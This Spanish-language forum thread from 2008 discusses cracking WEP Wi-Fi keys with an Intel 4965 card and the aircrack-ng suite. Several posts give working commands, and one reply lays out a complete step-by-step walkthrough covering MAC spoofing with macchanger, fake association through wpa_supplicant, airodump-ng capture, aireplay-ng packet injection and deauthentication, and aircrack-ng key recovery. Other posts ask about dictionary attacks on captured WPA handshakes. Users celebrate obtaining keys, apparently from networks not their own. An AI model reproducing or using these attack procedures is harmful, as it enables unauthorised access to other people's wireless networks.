?>/script>'; } ?> Inyectar con 4965 Widgets Magazine

Autor Tema: Inyectar con 4965  (Leído 254190 veces)

0 Usuarios y 1 Visitante están viendo este tema.

eldayicara

  • Visitante
Re: Inyectar con 4965
« Respuesta #80 en: 24-12-2008, 15:39 (Miércoles) »
Sí señor, asociación perfecta! Muchísimas gracias Bht Sata!

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #81 en: 24-12-2008, 16:49 (Miércoles) »
monkmonk a ti en windows la red esa que has crackeado, ¿cuantas rallitas verdes te da?

monkmonk

  • Visitante
Re: Inyectar con 4965
« Respuesta #82 en: 24-12-2008, 17:16 (Miércoles) »
Jacko, la verdad es k pokita, un 20% o asin...

foto:
http://img78.imageshack.us/img78/7780/dibujoeq4.jpg

pero igualmente, no entiendo el porque me tarda 2 horas en empezar.. >.<

Bht Sata

  • Visitante
Re: Inyectar con 4965
« Respuesta #83 en: 25-12-2008, 19:50 (Jueves) »
Haber por pasos, el mensaje del wpa_supplicant es normal, segundo, el problema del aircrack es normal, hay veces que se mete en un bucle y no halla nunca la clave, y tercero, para tu problema de inyeccion prueba a realizar una desautentificacion para que suban antes, haber si asi funciona, 1 saludo  ;)

monkmonk

  • Visitante
Re: Inyectar con 4965
« Respuesta #84 en: 25-12-2008, 22:09 (Jueves) »
que va tio, con la desautentificacion pasa lo mismo, me paso horas para que empieze, bueno.. nuse si se pasa horas, porque solo me a empezado una vez a las 2 horas, porque esta noche lo he dejado haver si hacia algo, y se ha pasado 7 horas, y nada.

jejej, weno, haver si me funciona de alguna manera >.<

Bht Sata

  • Visitante
Re: Inyectar con 4965
« Respuesta #85 en: 25-12-2008, 23:27 (Jueves) »
Pues si que es cosa rara si...pero los packets suben? o tampoko, estas falsificando el cliente o lo haces con uno conectado  :-\

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #86 en: 26-12-2008, 00:45 (Viernes) »
respuesta para el problema del aircrack:

¿habeis probado a usar el aircrack-ptw ?

Corregidme si me equivoco pero segun he leido en otro post este es su uso:

aircrack-ptw ficherocaptura.cap

o

aircrack-ng -z ficherocaptura.cap


Un saludo !

P.D. ¿Ambos comandos son equivalentes, no?

Bht Sata

  • Visitante
Re: Inyectar con 4965
« Respuesta #87 en: 26-12-2008, 01:43 (Viernes) »
Citar
MODIFICADOOOO (por tercera vez xd)

al final lo prove con PTW i me funciono, pero porque con PTW no tardo ni 1 segundo y de la forma normal no lo conseguia??

foto:

http://img185.imageshack.us/img185/1716/152ud2.png

PD: siento tantas modificaciones, pero es que no queria spammear y a la vez queria mantereros informados de lo que me pasava^^ nose si ice bien o mal ejejej
grax^^

Si, parece ser que si  ;D

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #88 en: 26-12-2008, 02:20 (Viernes) »
POR FIN !!!!!!!!!!!  POR FIN HE LOGRADO INYECTAR  !!!!!!!!!!

Bueno antes de nada tengo que dar las gracias a todas las personas de que han contribuido en este hilo porque gracias a ellos he logrado sacar mi primera wep no perteneciente a una WLAN_XX.  ;D

Bueno respecto al post anterior que he hecho me constesto yo mismo ya que seguro que ha alguien le sirve de ayuda:

Los dos comandos que he puesto son perfectamente válidos (en la version actual de wifiway), no obstante es mejor usar aircrack-ng -z ficherodecaptura.cap porque con el otro tienes que ponerle la ruta ubicando el .cap. Personalmente yo uso esto: aircrack-ng -z *.cap  asi me quito de escribir el nombre del archivo de captura y además uso el aircrack-ptw ( que para eso es la opción -z). Además de que con la opción -z, personalmente he sacado la clave en 0 segundos (con 30.000 IV's como podeis ver en la captura mas abajo), mientras que sin ella dura mucho mas.

En un humilde intento por ayudar a los que están como yo estaba antes, voy a explicar los pasos que he seguido detalladamente:

-------------------------------------------------------------------------------------------------------------------------------

1º Arranco wifiway, entro en modo gráfico. Abro el airodump y miro que red voy a Auditar, y copio en un .txt aparte toda la info.

airmon-ng start wlan0 CHANNEL

3º Creo el wpa.conf

Código:

network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0="232323343478787"
}

ifconfig wlan0 down

macchanger -m 00:11:22:33:44:55 wlan0

ifconfig wlan0 up

wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0



Como podeis ver al primera vez que puse el comando me salió el dichoso bucle infinito: Failed to iniciate AP scan ...
Pero hize Ctrl+C y volvi a poner el mismo comando y ya me asoció, podeis ver lo de CONNECTED.

airodump-ng -w dexter-back -c CHANNEL mon0



aireplay-ng -3 -b MAC DEL AP -h 00:11:22:33:44:55 mon0



aircrack-ng -z *.cap

10º KEY FOUND!




NOTA: Personalmente me comienza a inyectar 2 ó 3 minutos después de ejecutar el aireplay. Sobre el tema de que si estas muy lejos no puedes inyectar, tan solo tengo que decir que a mi en Windows solo me aparece esta red con una sola rallita verde y muchas veces ni siquiera la pillo, sin embargo ya veis que he sacado la clave en pocos minutos.
« Última modificación: 02-04-2009, 19:10 (Jueves) por Jacko »

monkmonk

  • Visitante
Re: Inyectar con 4965
« Respuesta #89 en: 26-12-2008, 13:39 (Viernes) »
Pues todavia nose el xk se pasa horas para inyectar o ni sikiera lo hace, i yo el router lo tengo a 2 rallitas con windows y tu a una i a los 3 mins ya empieza? que suerte cabron jejejejje
no lo entiendo, puede ser xk al router le pongo wep, i luego paro el pc? o sea, se keda el router solo. pero esto no tendria k ser problema! >.< no lo entiendo, y no puedo provar lo del mac filter xk no tengo nadie k se connecte a mi router aparte de yo xddd xk el pc del router ya usa su misma mac para connectar >.< cagonlaleche! xddddddd no me podria haver comprado un lapton con una 3945 no... xddddd

modificado:
PD: solo me van subiendo muuuuuuuuuuuuuuy lentamente los ACKs, que son?
« Última modificación: 26-12-2008, 14:40 (Viernes) por monkmonk »

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #90 en: 26-12-2008, 16:34 (Viernes) »
no se que son los ACKS, pero si te fijas en mi captura, yo ACKs no pillo ni uno  >:(

Desconectado drvalium

  • *******
  • Mensajes: 17370
  • Misántropo
Re: Inyectar con 4965
« Respuesta #91 en: 26-12-2008, 17:58 (Viernes) »
buenas

Citar
ACKNOWLEDGEMENT (ACK) (en español acuse de recibo): en comunicaciones entre com****dores, es un mensaje que se envía para confirmar que un mensaje o un conjunto de mensajes han llegado. Si el terminal de destino tiene capacidad para detectar errores, el significado de ACK es "ha llegado y además ha llegado correctamente".

para definición completa

http://es.wikipedia.org/wiki/ACK


saludos
« Última modificación: 26-12-2008, 18:04 (Viernes) por drvalium »

monkmonk

  • Visitante
Re: Inyectar con 4965
« Respuesta #92 en: 26-12-2008, 18:08 (Viernes) »
ok grac por la respuesta^^

la verdad, es k me a pasado algo raro ahorayo estava asin:


ROUTER--------> connectado con mi pc con un wifi
   |
   |
   |
el laptop intentando inyectar



pero no lo conseguia, hasta que me he desconectado con el PC grande, y entonces ha empezado a inyectar como cosaco a 500/s mas o menos, alguien save el porque me pasa esto?

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #93 en: 26-12-2008, 18:16 (Viernes) »
ALguien sabe si para las redes WLAN_XX con cifrado wpa, sirve el diccionario del wlandecrypter ?

SERASER

  • Visitante
Re: Inyectar con 4965
« Respuesta #94 en: 26-12-2008, 19:50 (Viernes) »
seguro no las wlanXX tienen por defecto claves wep y entonces la han cambiado por wpa a esperar tipkung

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #95 en: 26-12-2008, 20:53 (Viernes) »
seguro no las wlanXX tienen por defecto claves wep y entonces la han cambiado por wpa a esperar tipkung


Perdona pero no acabo de entender lo que has dicho.

y eso de "tipkung" que es ?

SERASER

  • Visitante
Re: Inyectar con 4965
« Respuesta #96 en: 26-12-2008, 21:21 (Viernes) »
basicamente un nuevo sistema de recuperacion de claves wpa que no se basa en diccionario pero esta en fase inicial y no esta depurado lo incluye wifiway 1.0 final

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #97 en: 26-12-2008, 21:43 (Viernes) »
ah pues no tenia ni idea de que existia nada llamado tipkung, de hecho he buscado en el buscador del foro y en google y no he encontrado absolutamente nada.

Pero mi pregunta era, que si pillo 1 handshake de una WLAN_XX y luego uso el aircrack pasandole el diccionario creado mediante el wlandecrypter, si eso tendría exito.

SERASER

  • Visitante
Re: Inyectar con 4965
« Respuesta #98 en: 26-12-2008, 23:11 (Viernes) »
ah pues no tenia ni idea de que existia nada llamado tipkung, de hecho he buscado en el buscador del foro y en google y no he encontrado absolutamente nada.

Pero mi pregunta era, que si pillo 1 handshake de una WLAN_XX y luego uso el aircrack pasandole el diccionario creado mediante el wlandecrypter, si eso tendría exito.

no, lee esto

https://foro.seguridadwireless.net/nueva_generacion_wireless/han_logrado_Auditar_en_15_minutos_la_encriptacion_wpa_tkiptunng-t17321.0.html

Jacko

  • Visitante
Re: Inyectar con 4965
« Respuesta #99 en: 27-12-2008, 02:49 (Sábado) »
gracias por el apunte seraser.
Por cierto, alguien lo ha probado ????
 Yo tan solo he probado el atake 0 ( aireplay-ng -0 30 -a mac router -h Mac del cliente mon0 )para pillar 1 handshake y no ha habido suerte.